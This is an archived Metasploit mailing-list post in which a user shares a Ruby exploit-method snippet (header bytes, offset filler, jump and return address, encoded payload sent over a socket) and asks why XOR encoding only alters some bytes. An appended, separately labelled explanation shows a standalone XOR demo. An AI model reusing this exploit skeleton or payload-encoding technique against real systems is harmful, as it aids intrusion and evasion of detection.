Metasploit mailing list archives
Need assistance with payload xor
From: ri0t at ri0tnet.net (ri0t)
Date: Wed, 28 Mar 2007 12:52:21 -0500
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Having a bit of trouble XOR'ing a payload in the new Metasploit 3 using
Rex::Encoding::Xor::Generic. Below is a small snippet of code:

    def exploit
      xor = Rex::Encoding::Xor::Generic
      connect
      print_status("Trying target #{target.name}...")
      header = "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+
               "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"
      filler = rand_text_english(1) * (target['Offset'])
      jump = [0xeb06eb06].pack("V")
      retadd = [target.ret].pack('V')
      buffer = jump + retadd + payload.encoded
      buffercoded = xor.encode(buffer, [0xb3].pack("V"))
      sploit = header + filler + buffercoded[0]
      sock.put(sploit)
      handler
      disconnect
    end

Unfortunately the xor.encode only XORs the first byte of jump, retadd and
payload, not the entire buffer. I am sure it's something I am missing due to a
simple lack of Ruby knowledge, but if anyone could point me in the right
direction I would be grateful.

Thanks,
ri0t

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFGCqtamTIaeYQNnq0RArwMAJ4wYNj0NszcdydMUSFTO4q6R2NyZwCbBnhP
MtW4Qxkp0iH07XoDRsfrYZI=
=Ss/h
-----END PGP SIGNATURE-----
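Added example, not part of the thread or of the Metasploit code base: a stand-alone repeating-key XOR written to behave the way the poster is using Rex::Encoding::Xor::Generic.encode (XOR each buffer byte with the key byte at position mod key length, return [encoded, key]). It is an assumption that the real Rex class works exactly this way; the point it demonstrates does not depend on that. The key in the post, [0xb3].pack("V"), is the 32-bit little-endian integer 0xb3, i.e. the four bytes "\xb3\x00\x00\x00". Used as a repeating key that XORs bytes 0, 4, 8, ... with 0xb3 and the other three bytes of every four with 0x00, which leaves them unchanged. That is why only the first byte of the 4-byte jump, the 4-byte return address and the payload appear encoded. A single-byte key, [0xb3].pack("C") or simply "\xb3", touches every byte. The sample buffer below is constructed for the example and is not real shellcode.

```ruby
# Added example: repeating-key XOR modelled on how the post uses
# Rex::Encoding::Xor::Generic.encode (assumed: XOR byte i with key[i % keylen],
# return [encoded, key]). Nothing here requires the Metasploit framework.
def xor_encode(buf, key)
  raise ArgumentError, "key must be a String" unless key.is_a?(String)
  raise ArgumentError, "zero-length key" if key.empty?
  b = buf.b
  k = key.b
  encoded = b.bytes.each_with_index.map do |byte, i|
    byte ^ k.getbyte(i % k.bytesize)
  end.pack("C*")
  [encoded, key]
end

# The poster's key: "V" packs 0xb3 as a 32-bit little-endian integer, so
# the key is 4 bytes, three of which are zero (XOR with 0 is a no-op).
FOUR_BYTE_KEY = [0xb3].pack("V")   # "\xB3\x00\x00\x00"
# A one-byte key XORs every position of the buffer with 0xb3.
ONE_BYTE_KEY  = [0xb3].pack("C")   # "\xB3"

# Constructed stand-in for jump + retaddr + payload (13 bytes, not real shellcode).
SAMPLE = [0xeb06eb06].pack("V") + [0x41424344].pack("V") + "\x90\x90\x90\x90\xcc".b

# Count how many bytes the encoder actually altered.
def bytes_changed(plain, encoded)
  plain.bytes.zip(encoded.bytes).count { |p, e| p != e }
end

def demo
  four, _ = xor_encode(SAMPLE, FOUR_BYTE_KEY)
  one, _  = xor_encode(SAMPLE, ONE_BYTE_KEY)
  {
    # Only positions 0, 4, 8, 12 are hit by 0xb3: 4 of 13 bytes change.
    four_byte_changed: bytes_changed(SAMPLE, four),
    # Every byte is XORed with a non-zero key byte: all 13 change.
    one_byte_changed:  bytes_changed(SAMPLE, one),
    # XOR is its own inverse: a decoder stub applying the same key recovers the original.
    roundtrip_ok:      xor_encode(one, ONE_BYTE_KEY)[0] == SAMPLE,
  }
end

if $PROGRAM_NAME == __FILE__
  r = demo
  puts "4-byte key changed #{r[:four_byte_changed]} of #{SAMPLE.bytesize} bytes"
  puts "1-byte key changed #{r[:one_byte_changed]} of #{SAMPLE.bytesize} bytes"
  puts "round trip ok: #{r[:roundtrip_ok]}"
end
```

The same check applies to the real module: whatever key is handed to xor.encode must have the length the decoder stub expects, and a multi-byte key assembled with pack("V") or pack("N") will carry zero bytes unless the integer fills all four. The encoded bytes also still have to avoid the target's bad characters, which a fixed key does not guarantee.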
Current thread:
- Need assistance with payload xor ri0t (Mar 28)
- Need assistance with payload xor mmiller at hick.org (Mar 28)